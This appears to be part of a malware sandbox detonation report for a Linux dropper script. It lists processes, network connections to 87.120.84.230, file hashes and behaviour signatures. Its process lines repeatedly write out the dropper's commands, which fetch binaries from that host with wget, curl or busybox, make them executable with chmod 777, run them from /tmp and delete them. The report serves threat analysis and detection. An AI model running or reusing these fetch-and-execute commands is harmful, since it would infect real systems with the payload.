/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 01:01
Reported
2024-10-29 01:04
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
24s
Max time network
132s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
Processes
/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh
[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
